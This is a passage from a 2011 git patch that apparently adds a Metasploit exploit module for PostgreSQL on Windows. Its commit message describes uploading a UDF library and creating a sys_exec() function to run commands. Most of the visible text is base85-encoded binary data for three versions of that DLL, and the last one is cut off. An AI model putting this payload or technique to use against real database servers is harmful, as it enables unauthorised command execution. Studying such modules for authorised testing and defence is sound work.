From b1178686cf1cbfc49392ccdc7ef2146aef8853d3 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <Tod_Beardsley@rapid7.com>
Date: Wed, 23 Mar 2011 19:36:07 +0000
Subject: [PATCH] Fixes #3988. Adds a command execution module for PostgreSQL
 by uploading a UDF library and adding sys_exec() as a temporary function.
 Requires the target to be Windows, uses Bernardo Damele A. G.'s binaries.

Also fixes a typo in the arguments to handler which clears up a heretofore mysterious exception (see exploit.rb).



git-svn-id: file:///home/svn/framework3/trunk@12111 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../postgres/8.2/lib_postgresqludf_sys.dll    | Bin 0 -> 6656 bytes
 .../postgres/8.3/lib_postgresqludf_sys.dll    | Bin 0 -> 6656 bytes
 .../postgres/8.4/lib_postgresqludf_sys.dll    | Bin 0 -> 6656 bytes
 lib/msf/core/exploit.rb                       |   2 +-
 lib/msf/core/exploit/postgres.rb              |  83 ++++++++++
 .../windows/postgres/postgres_payload.rb      | 147 ++++++++++++++++++
 6 files changed, 231 insertions(+), 1 deletion(-)
 create mode 100755 data/exploits/postgres/8.2/lib_postgresqludf_sys.dll
 create mode 100755 data/exploits/postgres/8.3/lib_postgresqludf_sys.dll
 create mode 100755 data/exploits/postgres/8.4/lib_postgresqludf_sys.dll
 create mode 100644 modules/exploits/windows/postgres/postgres_payload.rb

diff --git a/data/exploits/postgres/8.2/lib_postgresqludf_sys.dll b/data/exploits/postgres/8.2/lib_postgresqludf_sys.dll
new file mode 100755
index 0000000000000000000000000000000000000000..342d45a081ecf471591b59376d18d62ff454fdc7
GIT binary patch
literal 6656
zcmeHLdstIfwm*502T4f42+;%y7{v#MKu|$IgMdOs2m}HM8bWe_Kwc&%JT4;9Ku3(J
zIGtMC+K$@kV;rscs4rAr7Rrn`)>;~k6tvpn0D`s!EZ~`)_^9^w>v!)z_mBI{{=VN?
zd#%0J+I#J@&)Ivgwd?9390Wml02GCw(||gQ$o2gF#|UWl@H^`PogjDlpT;D0`KK4D
zj9k4zS7?xHxC*&et3$Z?FxOzxa#dPxT#AIN(J5g*jpojK>RN*TKF|lQL!M!l?@VMm
z;Ai=A5N{WCM`pMv%_YB9e9c7#?>|JCF1u~WTvt2vRG<BnvRpJxr6_Xxein&19)glE
zI4FC$dCfCfAB6R%V8{@}01_wiAV^RJs2;!!;FLP$SO{`+vA<BL-qq@oVj&U6<-n=y
zG;q-;<d6k|c%b#fRtOq*Hk&~m`1^IaQuEyG*G(_+lbazZ;U&rMGa2G6flDI~JfDus
z_0nH3Geb}x&<k;ioH}{{C&jxY&mSV7$2S-a3a7-`ZU!I#FacgDA_!`Jf&EYQ|8@q1
zd_f2V-lso}j3saGGksL};al>W46wFoU?4mQnhQZ(^QOed;G6ekwOyhIjW$i8k_@Yw
zN43T?q?zJ=HvY2JZWV6%4uyKqA#{c1KHip$Nkyl7GY&~@61;UhEps*vJ-TzsoY{_F
z3i<pc(>g*rVY$eOT+cvir*yq!N&Gb$US@6Ius)~l5_Gbv`9igTxn+=q_u7vgy?z$u
zLc)u6H9S1cN}!4u@3v}n$96BO-C|w3_xfw+roNI|I`-HzCB>Mxgbur=?5iR;O7gZ4
z-TN_Dq8V%)wWagIy`^b&xx6Uvy&pJG6b-6vMsjR%Jf=;I8Nk^Rq3tA5O{eM6!q!mR
z1xNdhpvcYh@)9LHt{C??b1-qNgR#$=#N(x=1zD%WgX+o%uIY$X&S;SMoEd78H+Yzr
zLx@{@+*0)GcJ(FG(CdYkX1ut;-p*qkt(O0xj<`^4TaA~B@3qx_cf-2lwF+Tlhpez(
zKQ0$untNl*#pGf6ewsauZf)l$WR<?!xiT{~wY*r=s>|_`e!*bbq?okg+xD(k^$hu=
zjm4;Xzq~R;>?bM2BG7!&siWRr1nN#<^SJ(0rDDTi@#DE(SMbyil(SE_cHM)-mY=r#
z6jF{(jK+@(KeNY=DBqu12lscxPm*ui@Atk=Laz*vPh%);R`16LCWab&)>+pstfK{F
zt8%P&*S9`AX->)-4p(uFh(nNjoHNCfxNBLqtxMLgTjRI$!F^AW^{i){)wiJEYI@!C
z46UaoVR|rcMqN_O{h{^aK}mIwxZ4G%S7F3Hx2kVBg0^`I&@ZLQme24RnRT0Z^FEyU
z=8vA+()oK5s$x6d39KD8u|<qi?J-nLPRO#YS16n&QCo!X<?>qz#n=of`jxp}(e-I-
zS1#R_xu<aM`#pbUPe^NrOmk-?ea$q8MT1vA=L?(Dd@?iUPc5EO|0yNOmb4=3%hy=K
zP81bh5Y(cZ1t@bq{p1b$g{v(C`0cqImSx&w)Nz|mPiL~WaRj1mOhJq&@}HX=b9Qs`
z)L#ky@ug;0NPWs>M|-K`$l^G(`@`<Wd8vdrQ&Y{Ycfa`uI%odp=qP=s+r>zl!-V~z
z?H-BrrWKVInZG?=+6qA>={E<(+1cwRa@tPK&cdfxy4@FTXtT_P(lp;X8r<Ri?mNlJ
zcX@=@x^LLY`zhJ81Cq~wePhazn(7`APc?Z&xRo$AFEi>V-ydOEstPF#wUzw$Df?M;
z=j;S}?X@bU538vHpJVTN?OIq}w77AWc%ZoXqjc6_6LDQ+2jWxIkNY_MM!EXtSGnEc
z-wzP)Qb)?lG=rOFCt)|dM=tjJBh`DLx3ao1>L8;JZ|`vPn>UkjVfau<Um!6zlY0$+
zMe9?JvfZ=m7B3`cM;tSe?w_x$Z;y(Io}P<viU{*YPhRb%B*oHD(|sIiw)dGC7wqVR
z^mNQk5@yN5szdu7<#-GHL9ZjaGp>|=ZPGH19b~f)6<p2ELHA{?Y0D|eF?1g(UQDm~
zLq}QH(epF>x>K1fMqQPHvT1^38OBF`Zb-GPNco{SYv%F8QxQbu9=dcccbrl5&7m&u
zGvm_faqN<F88=q1eeXiVS_bY)&&k78B;-UL8B3i>${YA7q@b{2l-ijc$8V^rWrb%E
zl0qlTBDOZn5U+^c)Y(d%sFtnS!}zA?N`m!~^`Uh=iBn~N<(>39nYoiyTvB&_&^g*<
z<b!n)%i?^#){S)BIU<f6@v=O|n)oGbZO%9~vITihD!UT7;m*y=Z`DG$*FD#{g)?vU
zcFyuPdr<=dA7e~B<+iTnjoeJ}w9H~CIBjb2jgqSbPsvy@&J^4B-q5QlVL1OHgddbs
zKF~0ydSGAtpw)+b@RsP?%06*wHb+@I$|rHw1^;ZD@k#V%2T8Tyj=!yK_n`Nt+Asft
zM)Hc;?Zf<3eR>r$gGwWA$X?G`bCDVzfX)l8Y)fIw{JF9IoVpGEtU6z}%GI~_Go$<u
z9Q3Ca>|mWdQZ*D#m=i?ck_c}1cNeJebD%}llY4hYIkG00f;Xf*B7R=`jcRs2i5O<B
z?VH?pP_Jk#UGfHoGlR>U#&T1rE#$S$WX|zDca6Hdx>|dvJN{;q`z8gB8&<TgIX7ED
zr+VRd4;b$AMm<V;Ezw-)(d?oecJG&gAwdfSoo!~(to+1XJ1Mea<}3Bn|NLWC!ol$a
zdl}oZ+3mN+1`3NwOOfoILxHv3zJFYt9oF|#6K2d;i@PJPUL*D~<f}DoE$1dPsQb2m
zd)jq!ADj83<2acT>>eL|)1e+J)3z36Ur+WR|8>mHZpN|C_uS7;Snn-8eJ<+)e)@Q0
z5i%LsZlqg@60BGh`Iz~TGirDs+b}0DZ)rZ}{a{T5>2y<0zhmvX(1HjI(%Y<#iNdvP
z37?vv)QWGf9~NFcL&0zoSoA-2pEyQ2)w+Jgt%Q)HJ?@jA(@(`P54mk52s2B<c5B;6
ztm&owf8nqv(X>sE3}kB-33okm!r;F0(7Yh|hoh0*hW_GjlT$dgdq4Z4q3H5OR*+-_
zIXCNv?70(XGu~V@O*~_g)LPqnAo5*aOTXXPv_6b2`R!w*pW60gc+3I&-=hyV{~Wl(
z7MJt+;?r)*jybj+=k$lYPMBDf!xSl5#VNmZqqFOiiQx^`cdrY_Y}}*9*@`abo?O`X
z^W=jlJg#NtvB~X~G*%(*owhf2r>6CE>GjO2+baAwMJ@lj{cS4pUxf9k)rV~MK}ONT
z@mD38P08PhZhO3KY1~?1rq#BcnEI<Yc<~<mK%UezF0}97Q&?x(WAY_L{tf%?QHUri
zIVH?|H;{GWM<LZS=R{d`<d}(gAtif&Qu~AZsg@D@?2$eOW#kex)=k83knK8pd>(2;
z+{$->vdLVtV-WJZUIY%8L&C}f7Z==m#3YCH3>*lkP<rA-n8#>Wy+IHXDhyk^WNCOr
z%*xof_*KEFC#PZz`M88r8;4P}*GsHOlf+2`U$1ZvZVrt9b3^f7%9ZOAJ`>;=5W6fl
zPNy(wU@c<g%C$<a1V#{*w$PXxqtp<)AEVVOBVv#vIs-p5bd6Aw9-o{cj*B4(Cq~gx
z*jVDN&ovgw4REeWSwK{j<dzA}FRHFo>dKa>RrxZ#u8?iqsP?fp_4vw+71PsTH7qy6
zzWl5_`k-E!f93<u7c|O4-|vZ6=<=RCUq1~o0=L#@usQkqr9k&Yy4|m`))Yu_;D-IM
zEjZe?gnb?IgjE@DK%;9z4*DLQ(G-V5A0IqMqASxgu0t822M-=xFe77i>Ki-CM`Y%5
z{1wb<7>P9*3_GhDF)8UqZgOR!a+;*V=x3im5m=M1(!epsRVp=14iX!5G&4G;fQ`mQ
znQ|4fN@tMN-av<RfhqaLumWL9RR+W)SI4N;flXa+J7}@l$$7L?6KtsH{^pyLVq8I(
zMy_2It22o`{y`r-#fnoI<@xHsBvrma9{cHNuQpC?oSA5hgY!*=g>x$~=QN*`nY|=C
zGPFhCZLVC13sJ_GuhJtbo%V09EP@vX&1mz|g?@c9-A8kNzh`2-ap<t=Y>DVyjb6@Q
zom%thcW+mhWuyiintt;bJ9oa<7mnDrmASQw1ZBZdc;v9-YzaXTY@8$8qyRU`cPdZf
zGgRX;&D~dIZ<qXeP+>rPl`^e~>ERCXAGQV=;29VCO4ke{UK*L?J&i(N(I`9J$BZa8
zHOdN<s#2OPwx+jXNUzUgAyfG><tvki&-=-Wbh;AWn-Z-IsnElpX>(e3SICo%GF@43
z$q{$U<$DX1m0GyGrgQ6g)yLE5aEWGrv|LtU2$L?;a6To=jAN@i3m(h5m#B{vFwF>9
zXZfcG4_QNu8{_qUn!9FGOt^mWa`?xOZrPjur7;%DDxqD)7gx6R9M{j)7v4p5a<bBn
zqAR{NX?}8J2wCJH@7aqeKJz_&Jc-rIJ-m7!qo_O4+s!L|nm>Wy?&Hp*Eb#DKK#Y?t
z@bDoM-E?62dsAnT+$r8<7Hhg2f$c_R5Qshme>YD$f$4u|0v+|FkQN5G5ow;jG?rvh
zLO1~;YKI(mNmR1XolK#chy-t)qp8QsgAz8K!t$m?yRB?SW-$qhGPF@8@T7Y9u66U7
zO{0eLNR)VjwQm$1k>bMeW_&*h&*5P4(3hirSDTVBZmx^=#iuuHQe|jDj|bJu&Vsle
zL3`M21_k@GkZ2$7j)wAZc<jDUXNfRjr=oL4!L5==5C`ITzRhQ=w1WW@rU=`BO;wuK
z`*3OkN6I+m%3WBGEdO*Ui<NLT_zHiZTzR}j+Y4={)q9*;NoZUgmB%-HFDD_S3HR$-
zyVo?ROvInNYi<8Y0S+%<H`w!f&jvQ9I4`jSBBP%TS~4p|`yuq9THSgLgG&hrTsdSv
zJi_k5jiz}WmEc@AH!~hW&6{{6488UYxXR~U02gG2?E<t9MKdj3=m4$0zJ5Dl)i&a4
zjKf5<&a&K}^mG`8P6J)&1&L=f#$g;bk)J9U?}T((`f&zYOCJeXTSia>sr&3j{mz#d
z6F251{#VW{E!Ztn&<`kT`2u5O23w{kOX=IOE5V==O=I^IU~SY}v6fbR9nsQ(x7@>*
zJ;40)UJ?**s2e*I21dG_xH_mm3R5;_UICdNT8Z0b_=1*xQcE-A)r<4T%>(_I5vQ%&
zHv8@CAb2qZS&8IkB+4qo+iC<S3?SAY#Fh>cx*KnVpf`X!QZsV1?onpK!%s5M-6S9c
z>cl#nr42uDOCHkPN`=5sY#Sy+nt?KC3y2yn^Tf1Saj#x<^$I$~4cz9@TlyFUR?sze
z;I{P>D)0lkA3@PZXAVM~UW}JyqF>qmKnGbBGq>8DH?KNNoGx|>v*h4HXfB2#E}DL}
z44Us%zvWDI{jc&Tt_ASoLjW<v0T9FaZvQ`&Cn+8b!~($pn4iV;Ozuoo34TLP1`5tR
zR4%ZP0;M}o44^C#1Vzb>Mp%=tuHcqy)LLV7fXSd;W>gfx8o6<iMx`+5jJg73kwT|g
zCO2yMr6B=au+yjtU?U=h4MwnGL<fZM1p&)x?p$sZVlWwzL~ViYf9Os4#12>*VTH+{
zLMmK-xS&KC;Eg8G3#=3yRHa~-EQF2E8((aWF9)X1ohu10h1FcO^BEl=HzsOJbtSMN
zfNN64D4aWMbU=YzZG;1sM+HCk{j%|M|1W6#x89?IUm9yv@bjRb%z+Zt!&)V*RXmF&
z>X`(Ic{<m>^z&@?6M+E&!sj}-v*>^_l~x!Uz}3n%fLZ(OE%2qW5dwZ}T6zGt^x51;
z@CE$P5J6}tKRm#h)pZ7{GsGAaMJfaw983n_pgepDXfx%jRf;umMLL)j=SwS4gy#$M
zBjh1)NH{FacTUT%NAq-?QNh0*!7p-GtiRYV7sr6*_Phjvyeb~x#S#H{&aY(gfam>6
z_RJ;?$nya70A_&K0Gws-Q+nVjT@#;{9G@f%<;Nu@L2D(_*fcO@O0^o&>x@XD0XFjC
zav0bp>Eue+>Bvw4#tKeq;0UIOQ7VB3_-Q>oZULEd5})(n_@z@k=T;eDr>6oJ(LW*1
zAwADq^J~C=7Vscz?ZP!M#&G}+kh^lSUJz6d{)-HN5m09U>;rW!05lDJvp`P@Py$c|
zuoK_|fTI9s0onkZJzyamga=t~a6o`a(37+8lVCTh!O<8TevPgv5Esfc@<NqDR$$U9
zAbp{%Km|TkXR|C{rG-o7V3uAK{)Pm6YcJ~*fG^Vk%azcJUYvE8v8&>=aaNwII&;>}
T5Tm2RS46FF#_*r=do%EFCh8<F

literal 0
HcmV?d00001

diff --git a/data/exploits/postgres/8.3/lib_postgresqludf_sys.dll b/data/exploits/postgres/8.3/lib_postgresqludf_sys.dll
new file mode 100755
index 0000000000000000000000000000000000000000..9113b56c27f721bc8bdaaafd6ccf2d198d3e78d1
GIT binary patch
literal 6656
zcmeHLc~n!^x<8o{l0XOnf*=Hpq7`Ex$RMB~gIK0O7!?d5Ie|bXlM|3zk!ZjgW0c!g
z+ujaKJKS0;Ez|)OhaeWUw~n<G8xgd&S1%w~D^MBE+lfQ9uj{V&{&{P?weDW)cfS3N
zdw=`nWbgfDtZagC5Cq`?P!xg=1L|n;&gZ{>i~zN3z)@G|0Ofq(VNCk@z}yOjo}<-i
z%5@SIM=DXPH3+8+=I9J+jzY~z$`Wx@8X3%^(_OevLW}VK4EBc2$W!>woPl@(-hZYa
z;^m|+h>w%fo${-dSDlpq;V%fw>9-k~<J3b>?0uh5wv*;4q!o_XPcsoFLr^*f2i=V`
zrahJQL)btnh5|thAaS4+<X;D<7QhJLkUHd82qHMy-zn7O)H<bDC?4Ys;IMT#IO$`u
z&jdkSpgph=g2o+cBj|&8e{7c;p1J)|^#V_;hoICKB>$et6BhEF7Ny|%WM0mf{+yc;
zg8G47s8i&y(E>Oq-YI$ZhzE8&on9w(NE~`201<!%@LY?BAlq~7f4cv-D<I(ULm}`!
z1L+hjCGM-g;J^5LOHxA~1jW$7M7R(%2ZGebbt|U9H}B5w{KhQ=JvoJn@+?X&&63Q>
zFA(1G#h<eDSOgvSu%>%>YyDXLL?$L1_4Huu%eRW~mhqed4qaQ&g^z^B>IbFX9~D?e
z$OlZP{bEWO2t~9k{=&5VEFCYlbgeE~)v4hhMGw_&7$oDFyRjTdaN69!#nUaCFGsHt
zY4Hr}rUh${)!EdDC35R``KB|QdkRFVnrquCF=oMc6=kuaE$yTB9s#;_4@YFp<wkjl
za?I$cYOt6a>-FxAkVYHwbrP3l6=JqTbl;mM$2Xia{5F5s8WK}It2F88($QW~07r<M
zE@14kq;t9186oz6NU|(bX&l1=OEF`rMq0i{<lXX{aS4PFx{@MM!w~7v#jbLb4KMuc
zQdeEr*aa@z`Vm;R04u(cv2BWKcQcbBgw`y4e)h0st1mD7`?njGe11k;BKQV(s?%-W
zg$<{(JNv>VyXj<&<w9s`VfChS%L=lyjg|2pC#pR1yAf+XCa3aBr#hm6A(^hKL_<rd
zbh|J>RE|ZUc{`6=4>E}~v%t1Wd$OiIGIOwUdLHu<p0-1_`?k<z-`?-?aKppU<Z;1Q
z-zC@oI5j*X`*4OCzH=sdl42sGmj)<@)l_LahT3WIn!b#dSTa7G8tt8LrUw-%S6O~4
zIW>H-%d3SFHLTziYqzO=5BW`TMJ~Pc53>a&E7RQLEh9gM-Z<`_WSJ?yV==t$o;rDb
z(*@5Eu8%o=$-H#4YHXA@&DpZxU<yX)9kSVd^T^2&KKgBbn&~TiUV(WXckZqXYucmD
zx&CiucsJfTvHQnSgKsjUwJU*!Sw;05Vb4rBlH9o@wG#WYYx%LfeDu4<CTX$T)Xyt#
zS_|GPpR+5!amX;|&3jj^{^?g)Wx{xYEuvZ>%keJAoA*Xm-}K+sr(4sP#(ukvEjY(-
zMAr+Z(e3vKh}L)NS@YZu{or=uO2+_xOR*o@bj$6X5wy=Om&M-f$B*C4;wQw%TwG_L
z-9x+$N%`M?yJEe{#J_lJQ4HFB{b%0w=59;&+#KS$q>ozfy~*#pg3g|ImN4Eoee-k-
zz0ZJs(0P|kwph^o3L^wnuj|g#<^K3USX8unR$+C0)i^$PBjI8E>Q2)fD95EpRk_Z0
zkBf=2Y_O5CW2mCpN-dfdl-ZG;UEkb$(j_{XW^j!rR58{k=ozLuw=+v!)J%rbLb>pI
z&-UhtS*dP~SL<Zn?9N*J)%M2Tp>T7Yu-#ucu*UWYDKn$7V>;#x;$3kEw<qeRw0ql`
zu9BpG4v_BBel@;Q^L^K>bjs?FDU|`Q(TD@Fd+#0}Yh(1|d(IF7=FXr_oY=1}3MLh&
zajxPo`S$WgPEa2enHSAx6h(h&Aosm8#yKAw9p_n$_*D?+#@g*K*C*0Z!$TZ-mKXZ7
ze7x*_ZYt(F8FOvludTc7Yw;%d(?0ts*W;So)k)JhR^F;nwp=M%h3+a$bJaAfblqQ6
zE^=#l^-N9k&2gVxmpm4mVXl)>*G-U3!}yr9x@^<ZRSzl)XY6mDiY6g<(a1TRaYn_B
zedoQ7jOTkM`Bojv`(b&;$6rNfFmRVN2b$~1$N@72OPdirKJdxbYd*?Rnyn~_rxXXK
zL=_U#!zN3%aYB5AOB0Rfru)8cJhiTpajW7|l;t<eFP0K=z@aNY`{mwVT|8OGAs=K@
zHT21t`zxatCq49?Z1ukVMN-U&ziAq4;BB&dO>1Z|9mxCn;!82B+w}6Aw;|l??kfo)
ztnr#JNnS=KjTt<RF>uTFUsTID1wxO4N@!tDy>)cP6{5RntP*EPY$<P-WQF4bD-d3Y
z*Nw%4v+D;wNglL#Q(Qx0d-wJWKcLkYnK#;YdyX!A^w%GLY#Z_+m%Ma4u&#6GU_n&I
zzr4^GZl&)%CgIGX+&WGkjozC4%?K%{s3a-~H#c(fKu4H3kdqkbXI>r1HrKHHkIp2p
zVgo<e8%UE+{P6vWt?Ve`><}V{OjIj&$_e<{(1QB?)`P>7?`~)DcjR+P_<d7t9dqSm
zQn;nDe{$E}LsjKc?GB8e4~Of)?}~_GQ?hLozx_o^#_~(ejXhy5`0Jn9A~)eU;T00w
zsEu<!y~u?-&TtuS8I7B3isL}P&8k=xSI3n4hJ^CZbsFP;X^p?>&uV79+~iN4H_vnL
z_y<vw)33kF*jzMFUP+FW6>UG7sOuaGUQ`s`f1<Pb(!-Ou+rs)ZVe7%60dHZ%YQO8O
zkZyJwY`I10_htP$C*)Xz-6cBiy1nlR<)X5%=vt;L<-M^U-(RcS+ibX^)Do}!!^a9w
z;6J#0Uqc&@>C(GdNFuE8tiES>dCau#zIgTQ(o$<=NX{3EMZ;c?M#+aWR`TT08040%
zA|V#nfle>Gxgkn;qi9%g<p>qym&$f~qcHv!^Zcoj>7}0I&GULwL(jUkC9w8{^p>>~
z)(`~+U1YX<HTrRP#qC{wYk$*GEQMs;wI4LX{+J2fqqB2kx^;Idz4kY}-Itklxkby;
zwNzw{3@rALYWMjM=e@bW!y<osQ0OyAj(IPL?7g1baVKERtsi5S#wfmi*!dpj>$p!<
ze--YtJqkV>78bz_Jxq`tJK+Cjxb{<K3n}<}Nk~2g_B*#%(jQtiF}!l>ntW9y@`e&;
zo!|ecYFD&=@_y{+lUtNb8oq|!xuZk!E`4WqCTn|5WM}OS1^!A!wziD)nWYk2k}=4r
zaGh?AxHrC0RB$r$=lJ&Z%giwq@^$pa&iRYVu8e;227aJ4-!Lw9`KEMLqv0)s&)da5
zgZn;$Nb&DYHTPZ!W*_)fKy!~7GmuVX*)*4L6b(=tAGqxA=x0zzKCnr*pM}P{N%+;`
ziIkMC3uc6{cAZhSJSC-JYXt;-)`An_Zwf5;EX*MSi!!S*@e1;V%pDhx(Tz@^k^Imw
zLHMGG$f)RqWr<12DG9nVT>Z(UYpHE(m_lieC<#4@q9XY*!GvdDXX5@}Qoos1w_fI*
zxVSh;BQ>aCH9CZ%h@K+>->C>j5QVy2Uz{LQkraAFCqXni`>F|)R}hva5alLk<_VJ$
zhyqw&<)s}OvZKZN3W*LbHpt{8X;pCzU#6*9Ts?MZQmH5tYc=J*`Zda#VtuV=i?|fc
zft9dC56|RjWo1WdN;kyq@Vh)lGK7bmz2r7u0>5f7krv<*yuS&4uLT$566e+vK>f#t
zd!F66z5r}1u5C?TgfR%38|0H0)D!vDf>xiCNhkz=xc6%}Xzy#;dAWJ#_Jr--E9;+`
zoVONFwAFvQ8M7Ql5)C?C7P@qFD7S(jk*$z<h-&o+tjblW-~@e2Uw!GYLJ3nsggT8B
z*6SA(oLmG=OB6_oMki_v&MK>frRplQ4PoUgbcjKsOi(I=>4`=5>4>V#QhK%l*3}Ae
z^6<Wuue_p?s8bR(2B9lENuigtFId`BrVLJ3l<6diNlN{UBi%pLuh1vKWrp(dIkh#$
zX8gz@rf6%Px&jy4^47$VEO~8;7Ex%_pS|p3KlDa(Co|Vub-erdx#HdKE1Hg0#aCT8
z*!G@EE8#8AuCMtAv-@v(*+IV4)_iU8Jm%%%#sRe(U79MBx58CK=|ZNhO|73TUMB^2
z%DgW%_pT|%#j2lP7E5)=OlsBVbuzKqz;bm7S%5iwRtNhGBO50++L<b`=zWz`Tg!?*
zG`#+1rJ-Fcmno|0;zX^skd3TotnZvE6U$x}S7<a<ga>V-+&4vPF;c6AcOLg@SJg@~
z^<s^SY4k?j7Z>inBzr{-uT|{vXmFoHb%U$KwdW5uj_Shm7pwfnmLKn)v+kUHS}bRE
z71~>j2>7j)9oDb8*|MLPtPN28q+Nt!y9rC+U;m}jmy0jHze)NE^w-MM+Bw?ttyFr=
zPl!fBk@Xl<4^hwv3_hC@;5F+dsyEl&+nw}kj4RWH<U?TQdIS=QX#E80!gAqKUvdq2
ziL|`nC0B0>iQq-^C%aI+C~USJoa{XbL|+1pK_qz-0}1YKL{^|Xl{`O)@aF5oD2eVq
zlg<_`NR1*wBr=Us-F{FbaG_9X1`^SW=}HYBKA}QAscbKL9AVip#Gge}@ZD*yGtuq6
zQyB#BS#(+$mrPA2j>vK0cq9G}8ISTd+Wq{nc<9G;48eKbHrVS^Pd~Y9lU-@do}Sm=
z_fWEXAdV}8dQZ}E9s5W?f=Y4HlfLep>G}Tgm~ck#sPY;Fk%+=z9Czj*G%$K3h{}q`
zwqUcHzB82gH3W~;_^o{{*(ItlFc*?YICmFb;tj0rYdTMChyFrua&2429_$_|<>~$@
zAtU4o7kRrR%>$~5=gmop*lp+I@O<BvQd8YPur14RpB;$T*N0<!{Ik@5hpuAY`LdOQ
z%L)o!=6gWecB&UQn!{`r;T~V&m=GwIfM#6BC1czgkASOv=?QRQW>`-^yHK>ibRHd`
zH#IeFA*O65EyvgmB#Xc4-lV%-H*^@-LeELuZ5X?L*g$z=puZh@&U6Q-qj&U^fwyS{
zMG*5>&)c7SfiZ9rUf}-_%+!J1Fa<q8QPX9Nm9@|`HCgSp1-lGPYK39!t`z*Tnk-n;
zDZH6vI)gXe#n;@&T)dkO#H-C?N5a8Ow~&^H+=<21j2V|ghF>hCEn>X9;|{sQ#@KXv
z-nen#4ravROW53V>l#R22tgJS#fHRM#CU51|9}qU`aozpLq>Pv^$@fJgd^LK>*n7I
zQh)h858X)yLSRlZ<4m3Sft!+0+bJ3Zrea+^8EON@Ko=A{T;q=EwBR<Kc8&@L#0}iy
zx`B;FZUIAM2X0wDr-3+N_z@Ischn?=xs`ZP0s5WwRX0#&F>>mSrE}{Gg}Fk9uux)6
z;u<TV=+lNrra|Lf>D!Ld*Z-=X0?c1*e25_of*6i>`~R`wos-5uY(N2wPjh%Gca*C5
ze<G&<14kXI7<l9ZquY-ipu%_vik0Z~u&PX1%UP>Zs`YU}2Az7bURnXGB>Dv^g;b}}
zYvjlRsYbO}qF3>%LxVVAe^JO`J(3UW^kAEa3kv1&gO<=;IGk8SXV4=n)N;-LFq+`8
zAMn(}QiD!`)H>sEK#SGEYYbo%SSHjds=?k^4(p#OpI0ZZ1+I?$Djlwdl^mtx85bnc
zuTWQOs$g9Z$Dl}%I`-7KAh|@Thl7^HE_@dIMdxSnpR@RHqsK0MVXm<YpC$cx4P>wu
zR?A?u^l2`!PbEmglePYRoTsb50yrQbeU4)jiwmkzs0Cp`9JNFRn2e`yftQ~c&F3ZN
z<OXr7pRRp0kIxGW<%fmwqJkV%T}PrCU4l+pp+I0MV$gvAYoj87&QPXQNYmijT(ByR
zmnN4+l?lqCC82O=6f7unEXyBf^JJc}3;#TW-{sC+fA?P^OaMQ(XD!48%98-kw`joo
z{Xv!tc<vu$PknNLyc9qSU<B9(;ArnYp&vY<X~{X6$?1YHUQ&8Glp)Gb%mGU#Qz{{?
zMvs*1U_B3B3j@D&jYQ@=6X|NfT*3Lwaqvoz$$$m;lX`N<0y4)UKI6fmOCx>8rRZQs
zB)OAl9}~xvp4F{+4d8zj@Stk##8oiIaR5Iccl`g2xPx2(WdQUufefGt^f?Y4=%)g^
ze1Ix|I)Lo}9|N=k90lkEaEyS3a1b6;y}_{nB14Z)ypNMzqXY+HaO~APmq1u9R!Pbg
zQnB2imO|Qcv0MQ@Rfk$!rclGx60l0o3;#p{zO@%^<lxKH!4ettd=y9D>Fn${d>ox;
ZrjD95ND<12OI@12)RDt~+P_<Y{{jG^CJ6ul

literal 0
HcmV?d00001

diff --git a/data/exploits/postgres/8.4/lib_postgresqludf_sys.dll b/data/exploits/postgres/8.4/lib_postgresqludf_sys.dll
new file mode 100755
index 0000000000000000000000000000000000000000..43ba07ad6668a48be48eb94d209c3df210689be7
GIT binary patch
literal 6656
zcmeHLc~n!^x<8p`5->t2Q@|(=5P=|qfP#Qx0SN>GC>TO=0)b2>Ck#)4XuujHinZGM
zTKlxNx7J%*s0v!DfLN8bT52ugjaD3bD-RH=6;OurcH&U=b#=Y>&s*!Qb@y7o^PO+p
z``c&Odw(gb>LDBiL3jWZg`ner+FOj{`q!6Xpmy^4(g`|Bx!`*olYGH9qeyAs>h#(|
zy;RMWNi`ZR!YzQgdZUJ`)NtcdMO?L34)YldD(`7%5&l<yH`szagSXdf$aKJadwC+R
z4oXGb9hBjaUoO7vpg{-jBW#D?W@MH_4?VT_cuF}Any!=;*<(M;M3?|U$rv0&T4YLk
zChLW;zBCL4f>=OeM?T2E5>Oq03BWG3%drqdaIk++sNSJ<NU=~1#u317Yj<$aC*)Hz
z1o43O=tc+{v#U+u9>jaKb=5p~dsX!kPp^ic#Fr$0&14F*gB%w5;QDl2j)(q&n+bw?
zfnBgeWVg`)*eTv2d47ojc6_}-FSASRdJ_N<fDQ0Mi-DlF7ubK@{@>1kfFBeLf#>PV
zpkOJYv%cGo>^W0WlL<kK8DJnh2$}^!k4)=VOo4CSnbYwdGZbx|L`9ia6_0LBV2QJY
zcRlc@tvyyj`#r4r9=@)6w0e9cCJmiFjrFOxPK39PrDt&&x~#MKh0tjAfXwZ~EbB1&
zsQHX%WF8Blh?d4&oU)x~;3d|xYw}iiXv4omn<_U9knt}2v0O-S#!|z>GpyP#My?X+
zF|4{xf#qLSwrLRS!mU4v&F41vWQo*eSGN^oEP|hk3gSguT1IR=0(9#^uBa}97w#%b
zx1b~Hfm~jc>wCKbYTJ-+;(6>kA!bWh_q{1{Oiicp(Y&F$fXLDr`SD*a8M!X<;R<n6
zS*(55WF9XqCBXKrG}Stp#5EqZ=CUTsWQ7MsZViu2iy?$?Hhv*$93(Y;f40!vh8O<5
z>uhDn=tUl<?n5wbK6Ut7*0xESjcFl;3F}hv;<O>_Ru6vYl|40!KRYMM6MTm|-NBr5
zal@IkjvG<Z{S30!dNDXLyL40M(yX*JQ*q3+Qzg^H-AJ7nlU{tOLlaiRl1`Nrqrv$!
zhE3=rD#RktoZTnuj=2!&7D3x;U29p(!j%KXQ*&Ip@bq2s{da_B+xA}S!wnCE6UGEz
z|CCUDdva)4e&96=eD_?!1jS57yZR}|H8fcZhSp(qo%#XIv!)!F9JxNv!tl#ct+xJ>
zcY5giv#t%4m?0%MSGP^$(d0SF6H%`-4x|b4RwX$nT8D23|9sLp+3KaZYc=k47EWB-
zba8qB&)t%|cus~z+k*0^xLX3V>y}}JZULK}gU}zB*PylHB=gt!%q+`#-t2vwwZ*xY
za=qV4ajP9MdMq7fcqOnJ&&JX*t7)DmYR}yzCv+@MEXHOoEDOIaMt`cUm*q0+vIZ7j
zp}tc%YoEAw&^XJx1^HN$e3@M!j1jb@A8AaQ;g*#-=dDz9<jU{Kb;(Pje%!_pbOzO;
zRf2wE-3VH}_1$Xr9A?u$n5Qna_v5$ZdUDLSm`qy@ie|7mn>~YKHnW3bV<Nv_Z=2Z@
